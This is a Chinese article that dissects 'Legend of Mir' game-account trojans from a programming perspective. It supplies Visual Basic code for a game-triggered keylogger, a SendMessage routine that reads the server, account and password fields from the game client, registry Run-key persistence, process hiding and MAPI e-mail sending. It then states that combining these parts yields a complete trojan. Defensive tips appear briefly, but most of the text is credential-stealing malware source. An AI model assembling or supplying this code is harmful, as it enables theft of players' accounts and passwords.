从编程角度分析传奇木马

自从韩国的网络游戏传奇于2002年十月进入我国后，在国内日渐风靡，游戏玩家逐日增多，与此同时也出现了一些被称为传奇木马的恶意软件，比如：传奇异度灵盗，传奇黑眼等等。这类软件虽然工作方式有所不同，但都被设计的具有窃取游戏帐号和密码的功能。广大玩家深受其害。所谓"知已知bi，百战百胜"。为了能更好的认识并防范这类软件，本文将从编程的角度揭示其工作原理及相应的应付手段。

首先来说一下键盘记录型的传奇木马。这类软件与一般的键盘记录软件大同小异，只是在进行键盘记录之前，先使用一个名为FindWindow的API函数判断传奇是否在运行，如果是的话，启动键盘记录功能，否则不动作。FindWindow的VB声名如下：

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

它可以用来返回符合指定类名(lpClassName)或窗口名(lpWindowsName)的窗口句柄。实现键盘记录这个功能时，大多数人想到的应该是使用钩子技术，HOOK用户的击键行为。其实除此之外，还有一API函数，同样可以轻松进行键盘记录:GetAsyncKeyState,这个函数根据虚拟键表判断按键类型。返回值为一个16位的二进制数，如果被按下则最高位为1，即返回-32767，声名如下:

Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer

例程:
dim aKey as integer
dim keyResult as string
keyResult=GetAsyncKeyState(13)
if keyResult=-32767 then
aKey="Enter"
endif

这类击键记录型传奇木马虽然能丝毫不差的记录传奇玩家在游戏中的所有击键行为，但往往需要对庞大的记录文件进行仔细分析才可能找到帐号和密码，非常费时费力。而对付这种软件的方法也非常简单：输入游戏ID和密码时，先随意输入200个字符，然后再清空输入框，输入你的正确信息，这样即使有人得到了你的击键记录文件，不用但心！二三年内他还找不到你的正确ID和密码！

另一种传奇木马的工作原理与上述完全不同，其核心是使用了一个功能强大的SendMessage函数，在其它API函数的配合下，直接抓取玩家输入的游戏帐号和密码！相关函数声名如下：

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Const WM_GETTEXT = &HD
Private Const WM_GETTEXTLENGTH = &HE
Private Const GW_HWNDNEXT = 2

下面给出一段代码，演示如何抓取传奇所在服务器，游戏帐号，密码：
Dim tex As String, tex2 As String, tex5 As String, tex6 As String
Private Sub Form_Load()
TexServer.Text = ""
TexPass.Text = ""
TexUser.Text = ""
End Sub

Private Sub TimMain_Timer()
Dim HwndServer As Long
HwndServer = FindWindow(vbNullString, "传奇客户端")
If HwndServer <> 0 Then
Dim ServerOwner As String, HwndCombo As Long
ServerOwner = "TComboBox"
HwndCombo = FindWindowEx(HwndServer, 0, ServerOwner, vbNullString)
If HwndCombo <> 0 Then
Dim SevLength As Long, SevCon As String
SevLength = SendMessage(HwndCombo, WM_GETTEXTLENGTH, 0, 0)
SevLength = SevLength + 1
SevCon = Space(SevLength)
SendMessage HwndCombo, WM_GETTEXT, SevLength, ByVal SevCon
TexServer.Text = SevCon
End If
End If
Dim HwndMain As Long
HwndMain = FindWindow(vbNullString, "legend of mir2")
If HwndMain <> 0 Then
Dim PassOwner As String, HwndPass As Long
PassOwner = "TEdit"
HwndPass = FindWindowEx(HwndMain, 0, PassOwner, vbNullString)
If HwndPass <> 0 Then
Dim PassLength As Long, PassCon As String
PassLength = SendMessage(HwndPass, WM_GETTEXTLENGTH, 0, 0)
PassLength = PassLength + 1
PassCon = Space$(PassLength)
SendMessage HwndPass, WM_GETTEXT, PassLength, ByVal PassCon
TexPass.Text = PassCon
Dim HwndUser As Long, UserLength As Long, UserCon As String
HwndUser = GetWindow(HwndPass, GW_HWNDNEXT)
If HwndUser <> 0 Then
UserLength = SendMessage(HwndUser, WM_GETTEXTLENGTH, 0, 0)
UserLength = UserLength + 1
UserCon = Space(UserLength)
SendMessage HwndUser, WM_GETTEXT, UserLength, ByVal UserCon
TexUser.Text = UserCon
End If
End If
End If
End Sub

以上代码实现了简单的抓取功能，只能在Win9X下运行，WinNT/2000中禁止不同的进程间相互访问数据，需要用到其它API创建一个数据共享才行。

对于这类软件的防范，对于一般玩家来说比较难做到。最好的办法是在传 奇客户端软件中加入一段程序，当用户输入数据时，判断是否有其它窗体向帐号密码框发送消息，并做相应处理，即对SendMessage进行防范，这种代码在网上有很多，而且能写传奇的韩国程序员想必也非等闲之辈，在下就不搬门弄斧了。
以上是对各类传奇木马核心功能的解析，接下来，我们来看它的其它功能。

1，开机自动运行
Private Declare Function RegcreateKey Lib "advapi32.dll" Alias "RegcreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Const REG_SZ = 1
Const HKEY_LOCAL_MACHINE = &H80000002
FileCopy "test.exe", "c:/windows/system/test.exe"
Dim ne As String
Dim na As String
SetMyValue HKEY_LOCAL_MACHINE, "SoftWare/Microsoft/Windows/CurrentVersion/Run", _
"wing", "c:/windows/system/test.exe"
Sub SetMyValue(hKey As Long, strPath As String, strValue As String, strData As String)
Dim keyHandle&
Dim lResult As Long
lResult = RegcreateKey(hKey, strPath, keyHandle&)
lResult = RegSetValueEx(keyHandle&, strValue, 0, REG_SZ, ByVal strData, Len(strData))
lResult = RegCloseKey(keyHandle&)
End Sub

以上给出一段例程，通过注册表实现开机自动运行。但在下也不能保证每种软件都是通过这种方法来实现的，也可能是修改Autoexec.bat,winstart.bat,win.ini，甚至是动态加载dll文件。

2,隐藏
这里是指不出现在任务栏列表中，win9x中的实现代码如下：
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
'这个函数可以获得当前进程一个唯一的标识符。
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
'这个函数可以将进程 ID 号为dwProcessID的进程注册或取消注册为"服务器"。
'所用常量:
'这里的常量也就是dwType的值。
Const RSP_SIMPLE_SERVICE = 1
Dim pid As Long, reserv As Long
'获取当前进程ID
pid = GetCurrentProcessId()
'注册为服务器
regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
最后是自动邮件发送功能，方法有很多种，可以利用VB自带的MAPI控件，API，或是第三方控件。
以MAPI控件单独发送邮件为例：
MAPISession1.signOn
with MAPI Message1
.mcgindex=-1
.recipdisplayname="test"
.msgsubject="test2"
.msgnotetext="test3"
.sessionID=MAPIsession1.sessionID
.send
end with

将以上各部分代码融合，即具有了一个传奇木马的所有基本功能，本文给出相关代码只是希望各位能更好的了解它的工作原理，做到更好的防范，希望大家善用